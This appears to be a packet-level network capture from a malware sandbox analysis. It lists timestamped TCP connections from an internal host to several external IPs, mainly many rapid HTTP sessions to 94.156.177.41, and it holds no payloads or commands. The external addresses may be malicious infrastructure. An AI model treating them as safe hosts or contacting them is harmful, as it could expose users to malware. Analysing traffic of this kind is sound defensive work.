Nov 20, 2024 07:57:03.021256924 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.021332026 CET  49173  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:03.023063898 CET  49173  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:03.027949095 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.028263092 CET  49173  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:03.033341885 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.741231918 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.741552114 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:03.741632938 CET  49173  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:03.836373091 CET  49173  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:03.841306925 CET  80  49173  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:04.438647032 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:04.443743944 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:04.443825960 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:04.453051090 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:04.458030939 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:04.458084106 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:04.463383913 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.105695009 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.105737925 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:05.105803013 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.106329918 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.106340885 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:05.310630083 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.310719013 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.310801029 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.310837030 CET  49174  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.315581083 CET  80  49174  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.501405001 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.506247044 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.506297112 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.508730888 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.513539076 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.513581038 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:05.518404961 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:05.719410896 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:05.719836950 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.721313953 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.721324921 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:05.726140976 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:05.726155996 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:06.001461029 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:06.001530886 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:06.001596928 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:06.001682043 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:06.042526960 CET  49175  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:06.042567015 CET  443  49175  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:06.374385118 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:06.374526024 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:06.374564886 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:06.374629021 CET  49176  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:06.379522085 CET  80  49176  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.040210962 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.045669079 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.045727015 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.048321962 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.053199053 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.053236961 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.058423042 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.917478085 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.917591095 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:07.917653084 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.933872938 CET  49177  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:07.939074993 CET  80  49177  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:08.388055086 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:08.392860889 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:08.392976046 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:08.395258904 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:08.400074959 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:08.400151968 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:08.405050993 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:08.770740986 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.770750999 CET  443  49180  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:08.770792007 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.813355923 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.813395023 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:08.813479900 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.933123112 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.933136940 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:08.933341026 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:08.933357000 CET  443  49180  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:08.954651117 CET  49181  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:08.959537029 CET  80  49181  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:08.959592104 CET  49181  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:09.108309984 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.108398914 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.108520031 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.108572006 CET  49178  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.113229036 CET  80  49178  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.276156902 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.281132936 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.281193018 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.283468008 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.288300037 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.288352966 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:09.293145895 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:09.549273968 CET  443  49180  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.549335003 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:09.554239035 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:09.554245949 CET  443  49180  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.554596901 CET  443  49180  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.554650068 CET  49180  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:09.568661928 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.568721056 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:09.577344894 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:09.577378035 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.577832937 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:09.577888966 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:10.035382032 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.035510063 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.035511971 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.035562992 CET  49182  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.040363073 CET  80  49182  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.296765089 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:10.343338013 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:10.470155001 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:10.470252991 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:10.470318079 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:10.507577896 CET  49179  443  192.168.2.22  198.244.140.41
Nov 20, 2024 07:57:10.507601976 CET  443  49179  198.244.140.41  192.168.2.22
Nov 20, 2024 07:57:10.516586065 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.521543980 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.523123980 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.527065039 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.531949043 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.533827066 CET  49181  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:10.533828974 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:10.534305096 CET  49184  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:10.538707018 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:10.539074898 CET  80  49181  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:10.539103031 CET  80  49181  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:10.539171934 CET  80  49184  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:10.539192915 CET  49181  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:10.540654898 CET  49184  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:10.540910959 CET  49184  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:10.545744896 CET  80  49184  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:11.112638950 CET  80  49184  192.3.243.136  192.168.2.22
Nov 20, 2024 07:57:11.112716913 CET  49184  80  192.168.2.22  192.3.243.136
Nov 20, 2024 07:57:11.261435032 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:11.261461020 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:11.261514902 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.263226032 CET  49183  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.268040895 CET  80  49183  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:11.415947914 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.420799971 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:11.420847893 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.422688007 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.427550077 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:11.427592039 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:11.432470083 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.155327082 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.155459881 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.155877113 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.156802893 CET  49185  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.160366058 CET  80  49185  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.345309019 CET  49186  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.350184917 CET  80  49186  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.350282907 CET  49186  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.352430105 CET  49186  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.357218027 CET  80  49186  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:12.359101057 CET  49186  80  192.168.2.22  94.156.177.41
Nov 20, 2024 07:57:12.363918066 CET  80  49186  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:13.064924955 CET  80  49186  94.156.177.41  192.168.2.22
Nov 20, 2024 07:57:13.064996004 CET  80  49186  94.156.177.41  192.168.2.22
                                                                    Nov 20, 2024 07:57:13.065120935 CET4918680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.065249920 CET4918680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.070075989 CET804918694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:13.457228899 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.462040901 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:13.462116003 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.464530945 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.469335079 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:13.469417095 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:13.474373102 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.190033913 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.190099001 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.190184116 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.191956997 CET4918780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.198396921 CET804918794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.800086021 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.806040049 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.806092978 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.816301107 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.821171999 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:14.821225882 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:14.826807022 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.539246082 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.539345980 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.539350033 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.539446115 CET4918880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.544258118 CET804918894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.707097054 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.712033987 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.712105989 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.714570045 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.719377995 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:15.719444990 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:15.724366903 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.122023106 CET8049184192.3.243.136192.168.2.22
                                                                    Nov 20, 2024 07:57:16.122073889 CET4918480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:57:16.334631920 CET49180443192.168.2.22198.244.140.41
                                                                    Nov 20, 2024 07:57:16.335067987 CET4918480192.168.2.22192.3.243.136
                                                                    Nov 20, 2024 07:57:16.455482960 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.455574989 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.455744028 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.455787897 CET4918980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.460614920 CET804918994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.610729933 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.615751028 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.619105101 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.621402025 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.626343012 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:16.626398087 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:16.631231070 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.347266912 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.347364902 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.347428083 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.347556114 CET4919080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.352339983 CET804919094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.491159916 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.496124983 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.496344090 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.498769045 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.503603935 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:17.507138014 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:17.512130976 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.216984034 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.217076063 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.217092037 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.217133999 CET4919180192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.222069979 CET804919194.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.354340076 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.359173059 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.359237909 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.360862017 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.365658045 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:18.365734100 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:18.370656013 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.096231937 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.096338034 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.096379995 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.096441984 CET4919280192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.101205111 CET804919294.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.242171049 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.247111082 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.247167110 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.248756886 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.253684044 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:19.253732920 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:19.258563995 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.092386961 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.092497110 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.093159914 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.093218088 CET4919380192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.097313881 CET804919394.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.461540937 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.466401100 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.466471910 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.468795061 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.473683119 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:20.473746061 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:20.478677034 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.191966057 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.192044973 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.192075968 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.192125082 CET4919480192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.197086096 CET804919494.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.586905956 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.591875076 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.591936111 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.594352007 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.599227905 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:21.599286079 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:21.604197025 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.322678089 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.322788954 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.322808981 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.322849989 CET4919580192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.327625990 CET804919594.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.453788042 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.458745003 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.458817959 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.460459948 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.465317965 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:25.465375900 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:25.470280886 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.325515985 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.325531960 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.325587988 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.325624943 CET4919680192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.330543995 CET804919694.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.462745905 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.467704058 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.467771053 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.469594002 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.474512100 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:26.474558115 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:26.479454041 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.207211971 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.207293987 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.207355022 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.207386017 CET4919780192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.212142944 CET804919794.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.342052937 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.346952915 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.347037077 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.348721027 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.353614092 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:27.353741884 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:27.358566999 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.068264961 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.068877935 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.068991899 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.069030046 CET4919880192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.073862076 CET804919894.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.238061905 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.242974997 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.245275021 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.247658014 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.252496004 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.253668070 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.258563042 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.977535009 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.977551937 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:28.977622032 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.977678061 CET4919980192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:28.982464075 CET804919994.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.113502979 CET4920080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:29.118392944 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.118469954 CET4920080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:29.120889902 CET4920080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:29.125745058 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.125787973 CET4920080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:29.130633116 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.974338055 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.974435091 CET804920094.156.177.41192.168.2.22
                                                                    Nov 20, 2024 07:57:29.974566936 CET4920080192.168.2.2294.156.177.41
                                                                    Nov 20, 2024 07:57:29.974566936 CET4920080192.168.2.2294.156.177.41
